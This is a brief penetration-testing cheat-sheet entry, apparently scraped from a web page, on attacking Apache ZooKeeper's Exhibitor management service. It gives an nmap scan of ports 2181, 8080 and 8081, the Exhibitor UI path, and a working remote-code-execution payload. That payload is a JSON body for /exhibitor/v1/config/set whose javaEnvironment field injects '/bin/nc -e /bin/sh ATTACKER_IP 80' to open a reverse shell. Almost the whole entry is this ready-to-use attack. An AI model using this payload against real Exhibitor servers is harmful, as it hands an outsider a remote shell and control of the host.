Exhibitor / ZooKeeper
Discovery
nmap -sC -sV TARGET -p 2181,8080,8081
# 2181/tcp open zookeeper Zookeeper 3.4.x
# 8080/tcp open http Jetty
# 8081/tcp open http nginxhttp://TARGET:8080/exhibitor/v1/ui/index.htmlExhibitor Config RCE
/exhibitor/v1/config/set"javaEnvironment":"$(/bin/nc -e /bin/sh 'ATTACKER_IP' '80' &)"{
"zookeeperInstallDirectory": "/opt/zookeeper",
"zookeeperDataDirectory": "/zookeeper/data",
"serversSpec": "1:pelican",
"javaEnvironment": "$(/bin/nc -e /bin/sh 'ATTACKER_IP' '80' &)",
"clientPort": "2181",
"connectPort": "2888",
"electionPort": "3888",
"autoManageInstances": "1",
"serverId": 1
}Last updated